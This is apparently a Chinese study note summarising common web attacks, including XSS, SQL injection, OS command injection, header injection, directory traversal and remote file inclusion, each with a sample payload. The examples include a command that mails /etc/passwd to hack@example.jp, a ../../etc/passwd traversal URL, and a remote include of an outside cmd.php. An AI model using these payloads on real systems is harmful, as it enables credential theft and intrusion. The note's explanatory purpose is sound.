一、XSS攻击,通过script 代码进行攻击。
危害:可以实现对网站的非法访问提示弹框或者引导用户把提交信息指定非法网站,记录后。再返回原网站。
事例:http://localhost/index.php?q="<script>alert('你被攻击了')</script>"
二、SQL攻击,通过可以执行SQL的获取参数,进行特殊处理。
危害:可以实现对数据库的相关数据获取。
事例:select * from test where name='aa' --- " and del=1";
可以实现该有的查询and del=1 被注释,结果返回所有name=aa的数据
三、OS攻击,指针对程序操作sheel脚本处理加以特殊处理。
危害:获取相关信息,最经典事例,发达邮件。
my $adr = $q->param('mailaddress');
open(MALL, "| /user/sbin.sendmail $adr");
print MAIL "From: info@example.com\n";
可以把指定邮件修改成还有分号的邮件地址,例如:;cat /etc/passwd | mail hack@example.jp
程序会变成:/usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp
程序会把linux下所有的用户名以邮件形式发送给 hack@example.jp。
四、HTTP首部注入攻击
属于被动攻击模式,只有向首部主体添加的内容时才有可能实现功击。
事例:
localtion:http://localhost/a.php?q=12345
set-cookie:uid=12345
通过修改某字段需要输出的值进行攻击。
危害:设置任何cookie 信息
重定向至任意URL
显示任意的主体(http响应截断攻击)
注:http响应截断攻击是用在HTTP部注入的一种攻击,攻击顺序相同,但是要将两个%0D%0A%0D%0A并排插入字符串后发达,利用这两个连续的换行就可以作出HTTP首部与主体分隔的空行 ,这样显示伪造的主体,达到攻击的目的,再让用户输入信息,可达到和跨站脚本攻击相同的效果。
五、邮件首部注入攻击
邮件首部注入是指web应用中的邮件发送攻能,攻击者通过向邮件首部to或者subject内任意添加非法内容发起的攻击,利用存在安全漏洞的web网站,可以任意邮件发送广告或者病毒邮件。
事例:
bob@example.com%0D%0ADcc; user@example.com
%0D%0ADcc为换行,一旦表格接收了这个换行符,就可以实现对另一个邮件的追发,原本是无法指定的。
六、目录遍历攻击
是指本无意公开的目录,通过非法截断后,达成访问目的一种攻击。
事例:
http://localhost/a.php?log=../../etc/passwd
七、运程文件包含漏洞
指当前脚本需要从其他文件读取内容时,利用外部服务器的url充当依赖文件,让脚本读取之后,可以任意运行脚要的一种攻击。
主要针对php中include或者require来说,5.2之后默认此功能无效。
http://localhost/a.php?mod =http://www.baidu.com/cmd.php&cmd=ls
八、程序设计缺陷引发的的安全一漏洞
九、不正确的错误消息处理。
十、会话劫持
十一、点击劫持
十二 、dos攻击
让服务器呈现一种停止状态,主要利用资源过载,实现停止 。
利用安全漏洞让服务器停止。
十三、后门程序
例如开过过程中调试程序的debug处理。